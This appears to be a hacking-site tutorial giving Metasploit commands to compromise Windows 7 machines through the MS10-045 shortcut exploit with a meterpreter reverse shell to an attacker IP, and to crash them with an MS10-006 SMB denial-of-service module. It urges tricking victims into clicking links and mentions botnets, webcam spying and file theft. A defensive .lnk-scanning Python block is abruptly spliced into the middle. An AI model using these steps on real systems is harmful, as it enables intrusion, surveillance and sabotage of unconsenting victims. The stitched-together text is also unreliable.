Extreme Hacking
Advanced Ethical Hacking Institute in Pune


In this tutorial, I will show you how to use a simple shortcut file to crack a Windows 7 computer.

Cracking into a computer can be useful for a number of reasons: it can give you access to the rest of the network, it can serve as a proxy to hide your IP, valuable files and details can be taken from it, it can be added to a botnet for DoS attacks, and more.

The operating system itself has become quite secure, but numerous vulnerabilities can still be found in other installed programs such as the browser, Adobe Reader, and Office. Some other methods are covered in my other tutorials. The vulnerability we will exploit here is one in the way Windows 7 handles shortcut files. Let's begin.

1) Open Metasploit
You should be able to do this by yourself by now.

2) Select the Exploit
Microsoft tracks this vulnerability as MS10-045; the exploit takes advantage of a buffer overflow in the shortcut DLL. Use this command in Metasploit to load the exploit (the module lives under the browser exploits):

Code:
msf > use exploit/windows/browser/ms10_045_shortcut_icon_dllloader

3) Configure the Exploit Options
The first option to set is the payload, and as before, we will use the Meterpreter. This is an amazingly powerful payload which we can use to completely own their box.

Code:
msf exploit(ms10_045_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp

Then we need to set the LHOST, which is the IP of our (the attacker's) computer:

Code:
msf exploit(ms10_045_shortcut_icon_dllloader) > set LHOST 192.168.1.111

4) Run the exploit
As usual, just use the command:

Code:
msf exploit(ms10_045_shortcut_icon_dllloader) > exploit

This generates a link and starts a server to host it.
Now we need the victim to click the malicious link!

5) Send the Link to the Victim
This will require a bit of social engineering to convince the user to click the link. Be creative: tell them it is the latest movie download site or the password to a locked RAR file. When the victim clicks the link, their security settings will probably prompt them to allow or deny the web page access to Windows Explorer, and they must click Allow.
When the victim clicks on the "Allow" prompt, Metasploit begins establishing a client/server connection between you and the victim. This process is fairly slow, so be patient. It may not even work, but be patient and hope it does.

We will now have control of their computer through the Meterpreter installed on their machine. Now you can go ahead and do almost anything you like! In previous tutorials I covered how to download files and view the webcam/microphone, but the fun doesn't have to stop there!
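From the defender's side, the shortcut files a module like this serves can be triaged offline. The following is an added example, not code from this tutorial or from Metasploit: a minimal parser for the Shell Link (.lnk) header and StringData block, with a heuristic that flags shortcuts whose icon is loaded from a DLL or control-panel (.cpl) file on a UNC path, plus a constructed sample shortcut (made-up share and file names) to run it against.

```python
import struct
from pathlib import Path

# Shell Link CLSID 00021401-0000-0000-C000-000000000046, as stored on disk (little-endian fields)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_ICON_LOCATION, IS_UNICODE = 0x01, 0x02, 0x40, 0x80
# StringData sections in on-disk order, each paired with the LinkFlags bit that says it is present
STRING_FIELDS = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", HAS_ICON_LOCATION)]

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file (only what is needed for triage)."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    off = header_size
    if flags & HAS_IDLIST:        # LinkTargetIDList: 2-byte size, then the ID list itself
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:      # LinkInfo: its first 4 bytes hold the structure's total size
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # character count, not byte count
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        off += count * width
    return fields

def is_suspicious(fields: dict) -> bool:
    """Heuristic: icon sourced from a library on a remote share. Local DLL icons are normal."""
    icon = fields.get("icon_location", "").lower()
    return icon.startswith("\\\\") and icon.endswith((".dll", ".cpl"))

def scan_directory(root: str) -> list:
    """Walk a directory tree and list every .lnk the heuristic flags (path, icon location)."""
    hits = []
    for p in Path(root).rglob("*.lnk"):
        try:
            fields = parse_lnk(p.read_bytes())
        except (ValueError, struct.error):
            continue
        if is_suspicious(fields):
            hits.append((str(p), fields["icon_location"]))
    return hits

def build_sample_lnk(icon_location: str) -> bytes:
    """Constructed test input: a minimal Unicode .lnk carrying only an IconLocation string."""
    flags = IS_UNICODE | HAS_ICON_LOCATION
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")
```

Real shortcuts also carry IDList and LinkInfo blocks, which the parser skips by their size fields; shortcuts that reference icons inside a local DLL are routine and are deliberately not flagged.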

EXTRA: Crashing their computer

This auxiliary module takes advantage of a vulnerability in Windows 7 and Windows Server 2008. It creates an infinite loop (the SMB negotiate response loop the module is named for) and crashes the system. That is not as useful or fun as owning the system, but it can be very destructive and annoying for someone you don't like.

1) Run Metasploit and load the appropriate module using this command:

Code:
msf > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop

2) Set the required options.

Code:
msf auxiliary(ms10_006_negotiate_response_loop) > show options

As you can see, the only required option is SRVHOST, which is our attacking computer's IP address. Set this option like this:

Code:
msf auxiliary(ms10_006_negotiate_response_loop) > set SRVHOST 192.168.1.8

3) Run the module!
Step 2 generates a shared folder at "\\192.168.1.8\Shared\Anything"; we then start the module with this command:

Code:
msf auxiliary(ms10_006_negotiate_response_loop) > run

When the victim clicks on the link we send them, their computer will freeze and crash.
Use the social engineering methods described above to get the victim to click the link. Good luck!